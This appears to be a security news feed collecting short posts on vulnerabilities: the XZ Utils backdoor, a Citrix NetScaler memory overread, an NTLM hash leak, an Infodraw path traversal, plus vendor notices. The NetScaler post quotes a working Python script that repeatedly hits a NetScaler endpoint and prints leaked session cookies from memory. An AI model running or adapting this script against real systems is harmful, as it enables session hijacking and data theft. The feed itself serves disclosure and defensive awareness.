Recent comments
Log in or create an account to share your comment.
Wolves in the Repository: A Software Engineering Analysis of the XZ Utils Supply Chain Attack
2026-06-02T04:35:59+0000 by sync_userhttps://arxiv.org/abs/2504.17473
The digital economy runs on Open Source Software (OSS), with an estimated 90\% of modern applications containing open-source components. While this widespread adoption has revolutionized software development, it has also created critical security vulnerabilities, particularly in essential but under-resourced projects. This paper examines a sophisticated attack on the XZ Utils project (CVE-2024-3094), where attackers exploited not just code, but the entire open-source development process to inject a backdoor into a fundamental Linux compression library. Our analysis reveals a new breed of supply chain attack that manipulates software engineering practices themselves -- from community management to CI/CD configurations -- to establish legitimacy and maintain long-term control. Through a comprehensive examination of GitHub events and development artifacts, we reconstruct the attack timeline, analyze the evolution of attacker tactics. Our findings demonstrate how attackers leveraged seemingly beneficial contributions to project infrastructure and maintenance to bypass traditional security measures. This work extends beyond traditional security analysis by examining how software engineering practices themselves can be weaponized, offering insights for protecting the open-source ecosystem.
For more details https://security.paloaltonetworks.com/CVE-2026-0300
This article provides the known indicators of compromise (IOCs) associated with malicious software c05d5254 and related activity, and actions to take if IOCs are discovered.
https://my.f5.com/manage/s/article/K000160486
Please, We Beg, Just One Weekend Free Of Appliances (Citrix NetScaler CVE-2026-3055 Memory Overread Part 2)
2026-03-30T06:20:52+0000 by sync_userFor more details -> https://labs.watchtowr.com/please-we-beg-just-one-weekend-free-of-appliances-citrix-netscaler-cve-2026-3055-memory-overread-part-2/
which includes
import base64
import requests
import urllib3
urllib3.disable_warnings()
BANNER = """ __ ___ ___________
__ _ ______ _/ |__ ____ | |_\\__ ____\\____ _ ________
\\ \\/ \\/ \\__ \\ ___/ ___\\| | \\| | / _ \\ \\/ \\/ \\_ __ \\
\\ / / __ \\| | \\ \\___| Y | |( <_> \\ / | | \\/
\\/\\_/ (____ |__| \\___ |___|__|__ | \\__ / \\/\\_/ |__|
\\/ \\/ \\/
watchTowr-vs-Citrix-NetScaler-CVE-2026-3055.py
(*) Citrix NetScaler Memory Overread Detection Artifact Generator - Aliz Hammond of watchTowr (@watchTowrcyber)
CVEs: [CVE-2026-3055]
"""
print(BANNER)
while True:
try:
resp = requests.get("https://<host>/wsfed/passive?wctx", verify=False, allow_redirects=False)
tass = resp.cookies.get('NSC_TASS', None)
if tass is None:
continue
tassText = base64.b64decode(tass)
memIdx = tassText.find(b'wctx=')
if memIdx != -1:
bled = tassText[memIdx+5:]
cookiePos = bled.find(b'Cookie')
if cookiePos != -1:
print(bled[cookiePos:].decode('ascii', errors='ignore'))
except Exception:
pass
Command injection vulnerability in FTP-Flask-python. The project seems no more maintained. Last update the April 28, 2017.
Nmap script to detect a Microsoft SharePoint instance version.
Usage:
$ nmap -p 443 --script ms-sharepoint-version.nse example.com
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-07-21 17:33 CEST
Nmap scan report for example.com (127.0.0.1)
Host is up (0.030s latency).
PORT STATE SERVICE
443/tcp open https
| ms-sharepoint-version:
| 16.0.10376:
| product: SharePoint Server 2019 SharePoint Server 2019 MUI/language patch
| build: 16.0.10376
|_ release_date: July 2021
Nmap done: 1 IP address (1 host up) scanned in 0.81 seconds
More information: https://github.com/righel/ms-sharepoint-version-nse
Path Traversal Vulnerability in Surveillance Software - Luxembourg and Belgium notified
2025-04-22T12:20:06+0000 by sync_userNumerous law enforcement agencies worldwide have been affected by a zero-day exploit (path traversal) in reconnaissance software. This apparently also includes body cameras used by special forces, surveillance equipment, and police drones.
The „Media Relay Service (MRS)“ (web server) software for reconnaissance devices from the Israeli manufacturer Infodraw is affected by a serious security vulnerability (Path Traversal Vulnerability). Security experts from Mint Secure discovered the vulnerability and initially reported it to the manufacturer and – due to a lack of response – subsequently to operators and CERTs worldwide in order to rule out further risks and responsibly disclose the vulnerability. This blog post describes technical details, cases from various countries, and the approach behind the discovery. Recommendations for affected organizations are also provided.

CVE-2025-24054, NTLM Exploit in the Wild - Checkpoint Research
2025-04-18T12:00:09+0000 by sync_user-
CVE-2025-24054 is a vulnerability related to NTLM hash disclosure via spoofing, which can be exploited using a maliciously crafted .library-ms file. Active exploitation in the wild has been observed since March 19, 2025, potentially allowing attackers to leak NTLM hashes or user passwords and compromise systems. Although Microsoft released a patch on March 11, 2025, threat actors already had over a week to develop and deploy exploits before the vulnerability began to be actively abused.
-
Around March 20–21, 2025, a campaign targeted government and private institutions in Poland and Romania. Attackers used malspam to distribute a Dropbox link containing an archive that exploited multiple known vulnerabilities, including CVE-2025-24054, to harvest NTLMv2-SSP hashes.
- Initial reports suggested that exploitation occurred once the .library-ms file was unzipped. However, Microsoft’s patch documentation indicated that the vulnerability could even be triggered with minimal user interaction, such as right-clicking, dragging and dropping, or simply navigating to the folder containing the malicious file. This exploit appears to be a variant of a previously patched vulnerability, CVE-2024-43451, as both share several similarities.
For more details: CVE-2025-24054, NTLM Exploit in the Wild
Yealink informs that the SIP-T46S has been discontinued since 2022-03-31
2025-01-24T10:18:50+0000 by sync_user""" Dear Customers,
Yealink hereby informs you that the SIP-T46S has been discontinued since 2022-03-31. After the date, new orders for the product would not be accepted.
After the End-of-Life date, Yealink will not pursue any new feature development on SIP-T46S, but we will follow the industry standard practices regarding software support of the discontinued (EOL) products. Consistent with such standards, Yealink will continue to offer support and after-sale service.
The general policy guidelines are:
(1) For the first year from the End of Life date, Yealink will offer full support, including HW/SW Technical Support, Apply Existing SW Bug Fixes, New Non-Critical SW Bug Fixes, New Critical SW Bug Fixes and New Security Fixes.
(2) For the second year till, and including, the fifth year from the End of Life, Yealink will attempt to provide SW bug fixes. In the EOL support phase, a SW upgrade of the product to a newer existing release will also be seen as a fix to the SW bug. Providing a fix may not be possible in some cases due to the limitation of hardware or software architecture, and Yealink in its sole discretion will determine what fixes, if any, will be provided.
(3) Yealink will not offer any New Features/Enhancements support from the End of Life.
(4) Spares or replacement parts for hardware will be available depending on your local distributors. Please contact your local Yealink distributors for HW Technical Support and HW Repair and Return (subject to inventory availability). The local Yealink distributors will provide you the corresponding HW support in accordance with Yealink Return Materials Authorization (RMA) process.
(5) Since the sixth year from the End of Life, Yealink will not offer any Support. """
7-Zip File Manager didn't propagate Zone.Identifier stream for extracted files from nested archives
2025-01-23T07:14:02+0000 by sync_user24.09 2024-11-29
-------------------------
- The default dictionary size values for LZMA/LZMA2 compression methods were increased:
dictionary size compression level
v24.08 v24.09 v24.09
32-bit 64-bit
8 MB 16 MB 16 MB -mx4
16 MB 32 MB 32 MB -mx5 : Normal
32 MB 64 MB 64 MB -mx6
32 MB 64 MB 128 MB -mx7 : Maximum
64 MB 64 MB 256 MB -mx8
64 MB 64 MB 256 MB -mx9 : Ultra
The default dictionary size values for 32-bit versions of LZMA/LZMA2 don't exceed 64 MB.
- 7-Zip now can calculate the following hash checksums: SHA-512, SHA-384, SHA3-256 and MD5.
- APM and HFS support was improved.
- If an archive update operation uses a temporary archive folder and
the archive is moved to the destination folder, 7-Zip shows the progress of moving
the archive file, as this operation can take a long time if the archive is large.
- The bug was fixed: 7-Zip File Manager didn't propagate Zone.Identifier stream
for extracted files from nested archives (if there is open archive inside another open archive).
- Some bugs were fixed.
https://sourceforge.net/p/sevenzip/discussion/45797/thread/b95432c7ac/